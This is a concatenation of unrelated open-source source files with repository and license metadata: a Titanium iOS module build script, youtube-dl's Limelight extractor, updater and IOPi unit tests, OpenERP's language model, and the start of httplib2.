    rc = os.system("xcodebuild -sdk iphoneos -configuration Release")
    if rc != 0:
        die("xcodebuild failed")
    rc = os.system("xcodebuild -sdk iphonesimulator -configuration Release")
    if rc != 0:
        die("xcodebuild failed")
    # build the merged library using lipo
    moduleid = manifest['moduleid']
    libpaths = ''
    for libfile in glob_libfiles():
        libpaths+='%s ' % libfile
    os.system("lipo %s -create -output build/lib%s.a" %(libpaths,moduleid))
def package_module(manifest,mf,config):
    """Assemble the distributable <moduleid>-iphone-<version>.zip.

    Packs the manifest, fat library, rendered documentation, assets,
    example, platform files, LICENSE, module.xcconfig and (if present)
    metadata.json under modules/iphone/<moduleid>/<version>/.
    """
    name = manifest['name'].lower()
    moduleid = manifest['moduleid'].lower()
    version = manifest['version']
    modulezip = '%s-iphone-%s.zip' % (moduleid,version)
    if os.path.exists(modulezip): os.remove(modulezip)
    zf = zipfile.ZipFile(modulezip, 'w', zipfile.ZIP_DEFLATED)
    modulepath = 'modules/iphone/%s/%s' % (moduleid,version)
    zf.write(mf,'%s/manifest' % modulepath)
    libname = 'lib%s.a' % moduleid
    zf.write('build/%s' % libname, '%s/%s' % (modulepath,libname))
    docs = generate_doc(config)
    if docs!=None:
        for doc in docs:
            for file, html in doc.iteritems():
                filename = string.replace(file,'.md','.html')
                zf.writestr('%s/documentation/%s'%(modulepath,filename),html)
    zip_dir(zf,'assets',modulepath,['.pyc','.js'])
    zip_dir(zf,'example',modulepath,['.pyc'])
    zip_dir(zf,'platform',modulepath,['.pyc','.js'])
    zf.write('LICENSE','%s/LICENSE' % modulepath)
    zf.write('module.xcconfig','%s/module.xcconfig' % modulepath)
    exports_file = 'metadata.json'
    if os.path.exists(exports_file):
        zf.write(exports_file, '%s/%s' % (modulepath, exports_file))
    zf.close()
if __name__ == '__main__':
    # Build pipeline: validate metadata, locate the SDK, compile the JS
    # asset, build the fat library and zip the distributable module.
    manifest,mf = validate_manifest()
    validate_license()
    config = read_ti_xcconfig()
    sdk = find_sdk(config)
    sys.path.insert(0,os.path.join(sdk,'iphone'))
    sys.path.append(os.path.join(sdk, "common"))
    compile_js(manifest,config)
    build_module(manifest,config)
    package_module(manifest,mf,config)
    sys.exit(0)
| mit |
codesparkle/youtube-dl | youtube_dl/extractor/limelight.py | 8 | 11581 | # coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
determine_ext,
float_or_none,
int_or_none,
)
class LimelightBaseIE(InfoExtractor):
_PLAYLIST_SERVICE_URL = 'http://production-ps.lvp.llnw.net/r/PlaylistService/%s/%s/%s'
_API_URL = 'http://api.video.limelight.com/rest/organizations/%s/%s/%s/%s.json'
    def _call_playlist_service(self, item_id, method, fatal=True):
        """Download a PlaylistService JSON document for *item_id*.

        ``_PLAYLIST_SERVICE_PATH`` is presumably supplied by the concrete
        extractor subclass -- not visible in this file section.
        """
        return self._download_json(
            self._PLAYLIST_SERVICE_URL % (self._PLAYLIST_SERVICE_PATH, item_id, method),
            item_id, 'Downloading PlaylistService %s JSON' % method, fatal=fatal)
def _call_api(self, organization_id, item_id, method):
return self._download_json(
self._API_URL % (organization_id, self._API_PATH, item_id, method),
item_id, 'Downloading API %s JSON' % method)
def _extract(self, item_id, pc_method, mobile_method, meta_method):
pc = self._call_playlist_service(item_id, pc_method)
metadata = self._call_api(pc['orgId'], item_id, meta_method)
mobile = self._call_playlist_service(item_id, mobile_method, fatal=False)
return pc, mobile, metadata
def _extract_info(self, streams, mobile_urls, properties):
video_id = properties['media_id']
formats = []
urls = []
for stream in streams:
stream_url = stream.get('url')
if not stream_url or stream.get('drmProtected') or stream_url in urls:
continue
urls.append(stream_url)
ext = determine_ext(stream_url)
if ext == 'f4m':
formats.extend(self._extract_f4m_formats(
stream_url, video_id, f4m_id='hds', fatal=False))
else:
fmt = {
'url': stream_url,
'abr': float_or_none(stream.get('audioBitRate')),
'vbr': float_or_none(stream.get('videoBitRate')),
'fps': float_or_none(stream.get('videoFrameRate')),
'width': int_or_none(stream.get('videoWidthInPixels')),
'height': int_or_none(stream.get('videoHeightInPixels')),
'ext': ext,
}
rtmp = re.search(r'^(?P<url>rtmpe?://(?P<host>[^/]+)/(?P<app>.+))/(?P<playpath>mp4:.+)$', stream_url)
if rtmp:
format_id = 'rtmp'
if stream.get('videoBitRate'):
format_id += '-%d' % int_or_none(stream['videoBitRate'])
http_url = 'http://cpl.delvenetworks.com/' + rtmp.group('playpath')[4:]
urls.append(http_url)
http_fmt = fmt.copy()
http_fmt.update({
'url': http_url,
'format_id': format_id.replace('rtmp', 'http'),
})
formats.append(http_fmt)
fmt.update({
'url': rtmp.group('url'),
'play_path': rtmp.group('playpath'),
'app': rtmp.group('app'),
'ext': 'flv',
'format_id': format_id,
})
formats.append(fmt)
for mobile_url in mobile_urls:
media_url = mobile_url.get('mobileUrl')
format_id = mobile_url.get('targetMediaPlatform')
if not media_url or format_id in ('Widevine', 'SmoothStreaming') or media_url in urls:
continue
urls.append(media_url)
ext = determine_ext(media_url)
if ext == 'm3u8':
formats.extend(self._extract_m3u8_formats(
media_url, video_id, 'mp4', 'm3u8_native',
m3u8_id=format_id, fatal=False))
elif ext == 'f4m':
formats.extend(self._extract_f4m_formats(
stream_url, video_id, f4m_id=format_id, fatal=False))
else:
formats.append({
'url': media_url,
'format_id': format_id,
'preference': -1,
'ext': ext,
})
self._sort_formats(formats)
title = properties['title']
description = properties.get('description')
timestamp = int_or_none(properties.get('publish_date') or properties.get('create_date'))
duration = float_or_none(properties.get('duration_in_milliseconds'), 1000)
filesize = int_or_none(properties.get('total_storage_in_bytes'))
categories = [properties.get('category')]
tags = properties.get('tags', [])
thumbnails = [{
'url': thumbnail['url'],
'width': int_or_none(thumbnail.get('width')),
'height': int_or_none(thumbnail.get('height')),
} for thumbnail in properties.get('thumbnails', []) if thumbnail.get('url')]
subtitles = {}
for caption in properties.get('captions', []):
lang = caption.get('language_code')
subtitles_url = caption.get('url')
if lang and subtitles_url:
subtitles.setdefault(lang, []).append({
'url': subtitles_url,
})
closed_captions_url = properties.get('closed_captions_url')
if closed_captions_url:
subtitles.setdefault('en', []).append({
'url': closed_captions_url,
'ext': 'ttml',
})
return {
'id': video_id,
'title': title,
'description': description,
'formats': formats,
'timestamp': timestamp,
'duration': duration,
'filesize': filesize,
'categories': categories,
'tags': tags,
'thumbnails': thumbnails,
'subtitles': subtitles,
}
class LimelightMediaIE(LimelightBaseIE):
    # Extractor for a single Limelight media item, addressed either by a
    # limelight:media:<id> pseudo-URL or by a player URL carrying mediaId.
    IE_NAME = 'limelight'
    _VALID_URL = r'''(?x)
        (?:
            limelight:media:|
            https?://
                (?:
                    link\.videoplatform\.limelight\.com/media/|
                    assets\.delvenetworks\.com/player/loader\.swf
                )
                \?.*?\bmediaId=
        )
        (?P<id>[a-z0-9]{32})
    '''
    _TESTS = [{
        'url': 'http://link.videoplatform.limelight.com/media/?mediaId=3ffd040b522b4485b6d84effc750cd86',
        'info_dict': {
            'id': '3ffd040b522b4485b6d84effc750cd86',
            'ext': 'mp4',
            'title': 'HaP and the HB Prince Trailer',
            'description': 'md5:8005b944181778e313d95c1237ddb640',
            'thumbnail': 're:^https?://.*\.jpeg$',
            'duration': 144.23,
            'timestamp': 1244136834,
            'upload_date': '20090604',
        },
        'params': {
            # m3u8 download
            'skip_download': True,
        },
    }, {
        # video with subtitles
        'url': 'limelight:media:a3e00274d4564ec4a9b29b9466432335',
        'md5': '2fa3bad9ac321e23860ca23bc2c69e3d',
        'info_dict': {
            'id': 'a3e00274d4564ec4a9b29b9466432335',
            'ext': 'mp4',
            'title': '3Play Media Overview Video',
            'thumbnail': 're:^https?://.*\.jpeg$',
            'duration': 78.101,
            'timestamp': 1338929955,
            'upload_date': '20120605',
            'subtitles': 'mincount:9',
        },
    }, {
        'url': 'https://assets.delvenetworks.com/player/loader.swf?mediaId=8018a574f08d416e95ceaccae4ba0452',
        'only_matching': True,
    }]
    _PLAYLIST_SERVICE_PATH = 'media'
    _API_PATH = 'media'

    def _real_extract(self, url):
        video_id = self._match_id(url)
        # getPlaylistByMediaId returns a one-item playlist for this media.
        pc, mobile, metadata = self._extract(
            video_id, 'getPlaylistByMediaId', 'getMobilePlaylistByMediaId', 'properties')

        return self._extract_info(
            pc['playlistItems'][0].get('streams', []),
            mobile['mediaList'][0].get('mobileUrls', []) if mobile else [],
            metadata)
class LimelightChannelIE(LimelightBaseIE):
    # Extractor for a Limelight channel: yields a playlist with one entry
    # per media item in the channel.
    IE_NAME = 'limelight:channel'
    _VALID_URL = r'''(?x)
        (?:
            limelight:channel:|
            https?://
                (?:
                    link\.videoplatform\.limelight\.com/media/|
                    assets\.delvenetworks\.com/player/loader\.swf
                )
                \?.*?\bchannelId=
        )
        (?P<id>[a-z0-9]{32})
    '''
    _TESTS = [{
        'url': 'http://link.videoplatform.limelight.com/media/?channelId=ab6a524c379342f9b23642917020c082',
        'info_dict': {
            'id': 'ab6a524c379342f9b23642917020c082',
            'title': 'Javascript Sample Code',
        },
        'playlist_mincount': 3,
    }, {
        'url': 'http://assets.delvenetworks.com/player/loader.swf?channelId=ab6a524c379342f9b23642917020c082',
        'only_matching': True,
    }]
    _PLAYLIST_SERVICE_PATH = 'channel'
    _API_PATH = 'channels'

    def _real_extract(self, url):
        channel_id = self._match_id(url)
        # begin=0&count=-1 asks the mobile playlist service for all items.
        pc, mobile, medias = self._extract(
            channel_id, 'getPlaylistByChannelId',
            'getMobilePlaylistWithNItemsByChannelId?begin=0&count=-1', 'media')

        # PC playlist, mobile playlist and API media list are index-aligned.
        entries = [
            self._extract_info(
                pc['playlistItems'][i].get('streams', []),
                mobile['mediaList'][i].get('mobileUrls', []) if mobile else [],
                medias['media_list'][i])
            for i in range(len(medias['media_list']))]

        return self.playlist_result(entries, channel_id, pc['title'])
class LimelightChannelListIE(LimelightBaseIE):
    # Extractor for a Limelight channel list: a playlist of channels, each
    # delegated to LimelightChannelIE via a limelight:channel: pseudo-URL.
    IE_NAME = 'limelight:channel_list'
    _VALID_URL = r'''(?x)
        (?:
            limelight:channel_list:|
            https?://
                (?:
                    link\.videoplatform\.limelight\.com/media/|
                    assets\.delvenetworks\.com/player/loader\.swf
                )
                \?.*?\bchannelListId=
        )
        (?P<id>[a-z0-9]{32})
    '''
    _TESTS = [{
        'url': 'http://link.videoplatform.limelight.com/media/?channelListId=301b117890c4465c8179ede21fd92e2b',
        'info_dict': {
            'id': '301b117890c4465c8179ede21fd92e2b',
            'title': 'Website - Hero Player',
        },
        'playlist_mincount': 2,
    }, {
        'url': 'https://assets.delvenetworks.com/player/loader.swf?channelListId=301b117890c4465c8179ede21fd92e2b',
        'only_matching': True,
    }]
    _PLAYLIST_SERVICE_PATH = 'channel_list'

    def _real_extract(self, url):
        channel_list_id = self._match_id(url)
        channel_list = self._call_playlist_service(channel_list_id, 'getMobileChannelListById')

        entries = [
            self.url_result('limelight:channel:%s' % channel['id'], 'LimelightChannel')
            for channel in channel_list['channelList']]

        return self.playlist_result(entries, channel_list_id, channel_list['title'])
| unlicense |
bq/web2board | src/Test/unit/Updaters/testWeb2boardUpdater.py | 1 | 2834 | import os
import sys
import unittest
from flexmock import flexmock, flexmock_teardown
from Test.testingUtils import restore_test_resources, restore_paths
from libs.PathsManager import PathsManager as pm
from libs.Updaters.Web2boardUpdater import Web2BoardUpdater, UpdaterError
class TestWeb2boardUpdater(unittest.TestCase):
    # Unit tests for Web2BoardUpdater, driven by on-disk fixture directories
    # that are restored before every test and by flexmock stubs.

    def setUp(self):
        # Sandbox: point PathsManager at the test resources and stub out
        # os.popen / sys.exit so update() cannot touch the real system.
        relative_data_path = os.path.join("Updater", "Web2boardUpdater")
        self.test_data_path = os.path.join(pm.TEST_SETTINGS_PATH, relative_data_path)
        self.main_path = os.path.join(self.test_data_path, "main")
        self.updater = Web2BoardUpdater()
        self.os_mock = flexmock(os, popen=lambda x: None)
        self.exit_mock = flexmock(sys, exit=lambda x: None)
        restore_test_resources(relative_data_path)
        # Downloaded versions live under main/_<version> in the sandbox.
        pm.get_dst_path_for_update = classmethod(lambda cls, v: self.main_path + os.sep + "_" + v)
        pm.PROGRAM_PATH = os.path.join(self.test_data_path, 'programPath')

    def tearDown(self):
        flexmock_teardown()
        restore_paths()

    def test_update_updatesFilesInProgramPath(self):
        # update() should create the program dir from the downloaded version.
        self.assertFalse(os.path.isdir(pm.PROGRAM_PATH))
        self.updater.update("0", pm.PROGRAM_PATH).result()
        self.assertTrue(os.path.isfile(pm.PROGRAM_PATH + os.sep + 'readme'))

    def test_update_removesOriginalFiles(self):
        # Files from the old installation must not survive an update.
        pm.PROGRAM_PATH = os.path.join(self.test_data_path, 'otherProgramPath')
        self.assertTrue(os.path.isfile(pm.PROGRAM_PATH + os.sep + 'new'))
        self.updater.update("0", pm.PROGRAM_PATH).result()
        self.assertTrue(os.path.isfile(pm.PROGRAM_PATH + os.sep + 'readme'))
        self.assertFalse(os.path.isfile(pm.PROGRAM_PATH + os.sep + 'new'))

    def test_update_raiseExceptionIfNoConfirmFile(self):
        # A version without its ".confirm" marker must abort the update.
        with self.assertRaises(UpdaterError):
            self.updater.update("1", pm.PROGRAM_PATH).result()
        self.assertFalse(os.path.isdir(pm.PROGRAM_PATH))

    def test_get_new_download_version__returnsVersionIfOnlyOneConfirm(self):
        self.assertEqual(self.updater.get_new_downloaded_version(), "0")

    def test_get_new_download_version__returnsNewerVersion(self):
        # With several confirmed versions, the highest version wins.
        versions = ["3.0.1", "3.0.0", "2.99.1"]
        for v in versions:
            with open(pm.get_dst_path_for_update(v) + ".confirm", "w"):
                pass
        self.assertEqual(self.updater.get_new_downloaded_version(), versions[0])

    def test_get_new_download_version__returnsNoneIfNoConfirm(self):
        os.remove(pm.get_dst_path_for_update("0") + ".confirm")
        self.assertIsNone(self.updater.get_new_downloaded_version())

    def test_clear_new_versions_removesAllVersionsFiles(self):
        # Only the fixture "readme" should remain after clearing.
        self.updater.clear_new_versions()
        files = os.listdir(self.main_path)
        self.assertEqual(len(files), 1)
        self.assertEqual(files[0], "readme")
| lgpl-3.0 |
abelectronicsuk/ABElectronics_Python_Libraries | IOPi/tests/get_interrupt_on_pin.py | 1 | 2348 | #!/usr/bin/env python
"""
================================================
ABElectronics IO Pi Tests | test get_interrupt_on_pin function
Requires python smbus to be installed
For Python 2 install with: sudo apt-get install python-smbus
For Python 3 install with: sudo apt-get install python3-smbus
run with: python3 get_interrupt_on_pin.py
================================================
This test validates the get_interrupt_on_pin function in the IOPi class.
=== Expected Result ============================
> Console Output:
get_interrupt_on_pin() low boundary check: PASSED
get_interrupt_on_pin() high boundary check: PASSED
Test Passed
"""
from __future__ import absolute_import, division, print_function, \
unicode_literals
try:
import sys
sys.path.append("..")
from IOPi import IOPi
except ImportError:
raise ImportError("Failed to import IOPi library")
def _boundary_check(iopi, pin, label):
    """Verify that get_interrupt_on_pin() rejects the out-of-range *pin*.

    Prints the same PASSED/FAILED/IOError message as before and returns
    True when the expected ValueError was raised, False otherwise.
    """
    try:
        iopi.get_interrupt_on_pin(pin)
    except ValueError:
        print("get_interrupt_on_pin() %s boundary check: PASSED" % label)
        return True
    except IOError:
        print("I2C IOError")
        return False
    else:
        print("get_interrupt_on_pin() %s boundary check: FAILED" % label)
        return False


def main():
    """
    Main program function
    """
    passed = True

    iopi = IOPi(0x20, False)  # new iopi object without initialisation

    # Out-of-range pins (valid range is 1 to 16) must raise ValueError.
    # NOTE: the original code labelled both checks "low out of bounds";
    # the second check exercises the high boundary (pin 17).
    if not _boundary_check(iopi, -1, "low"):
        passed = False
    if not _boundary_check(iopi, 17, "high"):
        passed = False

    # Round-trip every valid pin: write 0 then 1 to the interrupt-enable
    # flag and confirm get_interrupt_on_pin() reads each value back.
    for pin in range(1, 17):
        iopi.set_interrupt_on_pin(pin, 0)
        if iopi.get_interrupt_on_pin(pin) != 0:
            passed = False
            break
        iopi.set_interrupt_on_pin(pin, 1)
        if iopi.get_interrupt_on_pin(pin) != 1:
            passed = False
            break

    if passed is False:
        print("Test Failed")
    else:
        print("Test Passed")


if __name__ == "__main__":
    main()
| gpl-2.0 |
aaltinisik/OCBAltinkaya | openerp/addons/base/res/res_lang.py | 1 | 12956 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import locale
from locale import localeconv
import logging
import re
from openerp import tools
from openerp.osv import fields, osv
from openerp.tools.safe_eval import safe_eval as eval
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
class lang(osv.osv):
    # ORM model for installed languages and their locale formatting
    # parameters (date/time formats, decimal point, digit grouping).
    _name = "res.lang"
    _description = "Languages"

    # strftime directives that are not portable across platforms (see
    # tools.DATETIME_FORMATS_MAP).
    _disallowed_datetime_patterns = tools.DATETIME_FORMATS_MAP.keys()
    _disallowed_datetime_patterns.remove('%y') # this one is in fact allowed, just not good practice

    def install_lang(self, cr, uid, **args):
        """
        This method is called from openerp/addons/base/base_data.xml to load
        some language and set it as the default for every partners. The
        language is set via tools.config by the RPC 'create' method on the
        'db' object. This is a fragile solution and something else should be
        found.
        """
        lang = tools.config.get('lang')
        if not lang:
            return False
        lang_ids = self.search(cr, uid, [('code','=', lang)])
        if not lang_ids:
            self.load_lang(cr, uid, lang)
        # Make the language the default for new partners if none is set yet.
        ir_values_obj = self.pool.get('ir.values')
        default_value = ir_values_obj.get(cr, uid, 'default', False, ['res.partner'])
        if not default_value:
            ir_values_obj.set(cr, uid, 'default', False, 'lang', ['res.partner'], lang)
        return True

    def load_lang(self, cr, uid, lang, lang_name=None):
        """ Create the given language if necessary, and make it active. """
        # if the language exists, simply make it active
        lang_ids = self.search(cr, uid, [('code', '=', lang)], context={'active_test': False})
        if lang_ids:
            self.write(cr, uid, lang_ids, {'active': True})
            return lang_ids[0]

        # create the language with locale information
        fail = True
        iso_lang = tools.get_iso_codes(lang)
        # Try every candidate locale name until one can actually be set.
        for ln in tools.get_locales(lang):
            try:
                locale.setlocale(locale.LC_ALL, str(ln))
                fail = False
                break
            except locale.Error:
                continue
        if fail:
            lc = locale.getdefaultlocale()[0]
            msg = 'Unable to get information for locale %s. Information from the default locale (%s) have been used.'
            _logger.warning(msg, lang, lc)

        if not lang_name:
            lang_name = tools.ALL_LANGUAGES.get(lang, lang)

        def fix_xa0(s):
            """Fix badly-encoded non-breaking space Unicode character from locale.localeconv(),
               coercing to utf-8, as some platform seem to output localeconv() in their system
               encoding, e.g. Windows-1252"""
            if s == '\xa0':
                return '\xc2\xa0'
            return s

        def fix_datetime_format(format):
            """Python's strftime supports only the format directives
               that are available on the platform's libc, so in order to
               be 100% cross-platform we map to the directives required by
               the C standard (1989 version), always available on platforms
               with a C standard implementation."""
            # For some locales, nl_langinfo returns a D_FMT/T_FMT that contains
            # unsupported '%-' patterns, e.g. for cs_CZ
            format = format.replace('%-', '%')
            for pattern, replacement in tools.DATETIME_FORMATS_MAP.iteritems():
                format = format.replace(pattern, replacement)
            return str(format)

        lang_info = {
            'code': lang,
            'iso_code': iso_lang,
            'name': lang_name,
            'translatable': 1,
            'date_format' : fix_datetime_format(locale.nl_langinfo(locale.D_FMT)),
            'time_format' : fix_datetime_format(locale.nl_langinfo(locale.T_FMT)),
            'decimal_point' : fix_xa0(str(locale.localeconv()['decimal_point'])),
            'thousands_sep' : fix_xa0(str(locale.localeconv()['thousands_sep'])),
        }
        lang_id = False
        try:
            lang_id = self.create(cr, uid, lang_info)
        finally:
            # Always restore the process-wide locale changed above.
            tools.resetlocale()
        return lang_id

    def _check_format(self, cr, uid, ids, context=None):
        # Constraint: reject date/time formats using non-portable directives.
        for lang in self.browse(cr, uid, ids, context=context):
            for pattern in self._disallowed_datetime_patterns:
                if (lang.time_format and pattern in lang.time_format)\
                        or (lang.date_format and pattern in lang.date_format):
                    return False
        return True

    def _check_grouping(self, cr, uid, ids, context=None):
        # Constraint: 'grouping' must evaluate to a list of ints, e.g. [3, 0].
        for lang in self.browse(cr, uid, ids, context=context):
            try:
                if not all(isinstance(x, int) for x in eval(lang.grouping)):
                    return False
            except Exception:
                return False
        return True

    def _get_default_date_format(self, cursor, user, context=None):
        return '%m/%d/%Y'

    def _get_default_time_format(self, cursor, user, context=None):
        return '%H:%M:%S'

    _columns = {
        'name': fields.char('Name', required=True),
        'code': fields.char('Locale Code', size=16, required=True, help='This field is used to set/get locales for user'),
        'iso_code': fields.char('ISO code', size=16, required=False, help='This ISO code is the name of po files to use for translations'),
        'translatable': fields.boolean('Translatable'),
        'active': fields.boolean('Active'),
        'direction': fields.selection([('ltr', 'Left-to-Right'), ('rtl', 'Right-to-Left')], 'Direction', required=True),
        'date_format':fields.char('Date Format', required=True),
        'time_format':fields.char('Time Format', required=True),
        'grouping':fields.char('Separator Format', required=True,help="The Separator Format should be like [,n] where 0 < n :starting from Unit digit.-1 will end the separation. e.g. [3,2,-1] will represent 106500 to be 1,06,500;[1,2,-1] will represent it to be 106,50,0;[3] will represent it as 106,500. Provided ',' as the thousand separator in each case."),
        'decimal_point':fields.char('Decimal Separator', required=True),
        'thousands_sep':fields.char('Thousands Separator'),
    }
    _defaults = {
        'active': 1,
        'translatable': 0,
        'direction': 'ltr',
        'date_format':_get_default_date_format,
        'time_format':_get_default_time_format,
        'grouping': '[3, 0]',
        'decimal_point': '.',
        'thousands_sep': ',',
    }
    _sql_constraints = [
        ('name_uniq', 'unique (name)', 'The name of the language must be unique !'),
        ('code_uniq', 'unique (code)', 'The code of the language must be unique !'),
    ]
    _constraints = [
        (_check_format, 'Invalid date/time format directive specified. Please refer to the list of allowed directives, displayed when you edit a language.', ['time_format', 'date_format']),
        (_check_grouping, "The Separator Format should be like [,n] where 0 < n :starting from Unit digit.-1 will end the separation. e.g. [3,2,-1] will represent 106500 to be 1,06,500;[1,2,-1] will represent it to be 106,50,0;[3] will represent it as 106,500. Provided ',' as the thousand separator in each case.", ['grouping'])
    ]

    @tools.ormcache(skiparg=3)
    def _lang_data_get(self, cr, uid, lang, monetary=False):
        # Return (grouping, thousands_sep, decimal_point) for *lang*, which
        # may be a language code or a database id; falls back to en_US.
        if type(lang) in (str, unicode):
            lang = self.search(cr, uid, [('code', '=', lang)]) or \
                self.search(cr, uid, [('code', '=', 'en_US')])
            lang = lang[0]
        conv = localeconv()
        lang_obj = self.browse(cr, uid, lang)
        thousands_sep = lang_obj.thousands_sep or conv[monetary and 'mon_thousands_sep' or 'thousands_sep']
        decimal_point = lang_obj.decimal_point
        grouping = lang_obj.grouping
        return grouping, thousands_sep, decimal_point

    def write(self, cr, uid, ids, vals, context=None):
        # The language code is immutable once created.
        if 'code' in vals:
            for rec in self.browse(cr, uid, ids, context):
                if rec.code != vals['code']:
                    raise osv.except_osv(_('User Error'), _("Language code cannot be modified."))
        # Invalidate the cached locale data for the modified languages.
        for lang_id in ids :
            self._lang_data_get.clear_cache(self)
        return super(lang, self).write(cr, uid, ids, vals, context)

    def unlink(self, cr, uid, ids, context=None):
        # Guard against removing en_US, the current user language or any
        # still-active language; also drop the language's translations.
        if context is None:
            context = {}
        languages = self.read(cr, uid, ids, ['code','active'], context=context)
        for language in languages:
            ctx_lang = context.get('lang')
            if language['code']=='en_US':
                raise osv.except_osv(_('User Error'), _("Base Language 'en_US' can not be deleted!"))
            if ctx_lang and (language['code']==ctx_lang):
                raise osv.except_osv(_('User Error'), _("You cannot delete the language which is User's Preferred Language!"))
            if language['active']:
                raise osv.except_osv(_('User Error'), _("You cannot delete the language which is Active!\nPlease de-activate the language first."))
            trans_obj = self.pool.get('ir.translation')
            trans_ids = trans_obj.search(cr, uid, [('lang','=',language['code'])], context=context)
            trans_obj.unlink(cr, uid, trans_ids, context=context)
        return super(lang, self).unlink(cr, uid, ids, context=context)

    #
    # IDS: can be a list of IDS or a list of XML_IDS
    #
    def format(self, cr, uid, ids, percent, value, grouping=False, monetary=False, context=None):
        """ Format() will return the language-specific output for float values"""
        if percent[0] != '%':
            raise ValueError("format() must be given exactly one %char format specifier")

        formatted = percent % value

        # floats and decimal ints need special action!
        if grouping:
            lang_grouping, thousands_sep, decimal_point = \
                self._lang_data_get(cr, uid, ids[0], monetary)
            eval_lang_grouping = eval(lang_grouping)

            if percent[-1] in 'eEfFgG':
                # group the integer part only, keep the fractional part intact
                parts = formatted.split('.')
                parts[0], _ = intersperse(parts[0], eval_lang_grouping, thousands_sep)

                formatted = decimal_point.join(parts)
            elif percent[-1] in 'diu':
                formatted = intersperse(formatted, eval_lang_grouping, thousands_sep)[0]

        return formatted

# import re, operator
# _percent_re = re.compile(r'%(?:\((?P<key>.*?)\))?'
#                          r'(?P<modifiers>[-#0-9 +*.hlL]*?)[eEfFgGdiouxXcrs%]')

# Instantiate to register the model (old-style OpenERP API).
lang()
def split(l, counts):
    """Split *l* into consecutive chunks whose sizes come from *counts*.

    Special count values: -1 stops splitting immediately; 0 repeats the
    previous chunk size until the input is exhausted.  Any unconsumed
    remainder is appended as a final chunk.

    >>> split("hello world", [])
    ['hello world']
    >>> split("hello world", [1])
    ['h', 'ello world']
    >>> split("hello world", [2])
    ['he', 'llo world']
    >>> split("hello world", [2,3])
    ['he', 'llo', ' world']
    >>> split("hello world", [2,3,0])
    ['he', 'llo', ' wo', 'rld']
    >>> split("hello world", [2,-1,3])
    ['he', 'llo world']
    """
    chunks = []
    remaining = l
    previous_size = len(l)          # chunk size reused when a 0 count is seen
    for size in counts:
        if not remaining or size == -1:
            break
        if size == 0:
            # Repeat the previous chunk size until nothing is left.
            while remaining:
                chunks.append(remaining[:previous_size])
                remaining = remaining[previous_size:]
            break
        chunks.append(remaining[:size])
        remaining = remaining[size:]
        previous_size = size
    if remaining:
        chunks.append(remaining)
    return chunks


# Splits a formatted number into (non-digit prefix, digits, trailing rest).
intersperse_pat = re.compile('([^0-9]*)([^ ]*)(.*)')

def intersperse(string, counts, separator=''):
    """Insert *separator* into the numeric part of *string*, grouping the
    digits from the right according to *counts* (see split()).

    Returns a (formatted_string, separators_inserted) tuple.
    """
    prefix, digits, suffix = intersperse_pat.match(string).groups()
    # Group from the right: reverse, chop into chunks, then reverse back.
    groups = split(digits[::-1], counts)
    body = separator.join(g[::-1] for g in groups[::-1])
    inserted = len(groups) - 1 if groups else 0
    return prefix + body + suffix, inserted
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
Elettronik/SickRage | lib/httplib2/__init__.py | 106 | 71120 | from __future__ import generators
"""
httplib2
A caching http interface that supports ETags and gzip
to conserve bandwidth.
Requires Python 2.3 or later
Changelog:
2007-08-18, Rick: Modified so it's able to use a socks proxy if needed.
"""
__author__ = "Joe Gregorio (joe@bitworking.org)"
__copyright__ = "Copyright 2006, Joe Gregorio"
__contributors__ = ["Thomas Broyer (t.broyer@ltgt.net)",
"James Antill",
"Xavier Verges Farrero",
"Jonathan Feinberg",
"Blair Zajac",
"Sam Ruby",
"Louis Nyffenegger"]
__license__ = "MIT"
__version__ = "0.9.2"
import re
import sys
import email
import email.Utils
import email.Message
import email.FeedParser
import StringIO
import gzip
import zlib
import httplib
import urlparse
import urllib
import base64
import os
import copy
import calendar
import time
import random
import errno
try:
from hashlib import sha1 as _sha, md5 as _md5
except ImportError:
# prior to Python 2.5, these were separate modules
import sha
import md5
_sha = sha.new
_md5 = md5.new
import hmac
from gettext import gettext as _
import socket
try:
from httplib2 import socks
except ImportError:
try:
import socks
except (ImportError, AttributeError):
socks = None
# Build the appropriate socket wrapper for ssl
try:
    import ssl # python 2.6
    ssl_SSLError = ssl.SSLError
    def _ssl_wrap_socket(sock, key_file, cert_file,
                         disable_validation, ca_certs):
        # Wrap *sock* with the stdlib ssl module, optionally verifying the
        # peer certificate against the *ca_certs* bundle.
        if disable_validation:
            cert_reqs = ssl.CERT_NONE
        else:
            cert_reqs = ssl.CERT_REQUIRED
        # We should be specifying SSL version 3 or TLS v1, but the ssl module
        # doesn't expose the necessary knobs. So we need to go with the default
        # of SSLv23.
        return ssl.wrap_socket(sock, keyfile=key_file, certfile=cert_file,
                               cert_reqs=cert_reqs, ca_certs=ca_certs)
except (AttributeError, ImportError):
    # Pre-2.6 fallback: socket.ssl() cannot validate certificates at all,
    # so refuse to run unless validation was explicitly disabled.
    ssl_SSLError = None
    def _ssl_wrap_socket(sock, key_file, cert_file,
                         disable_validation, ca_certs):
        if not disable_validation:
            raise CertificateValidationUnsupported(
                "SSL certificate validation is not supported without "
                "the ssl module installed. To avoid this error, install "
                "the ssl module, or explicity disable validation.")
        ssl_sock = socket.ssl(sock, key_file, cert_file)
        return httplib.FakeSocket(sock, ssl_sock)


if sys.version_info >= (2,3):
    from iri2uri import iri2uri
else:
    # IRI handling needs Python 2.3+; degrade to the identity function.
    def iri2uri(uri):
        return uri
def has_timeout(timeout):
    """Return True when *timeout* is an explicit timeout value.

    Both None and the socket module's global-default sentinel (present on
    Python 2.6+) count as "no timeout set".
    """
    if timeout is None:
        return False
    sentinel = getattr(socket, '_GLOBAL_DEFAULT_TIMEOUT', None)
    return timeout is not sentinel
__all__ = [
'Http', 'Response', 'ProxyInfo', 'HttpLib2Error', 'RedirectMissingLocation',
'RedirectLimit', 'FailedToDecompressContent',
'UnimplementedDigestAuthOptionError',
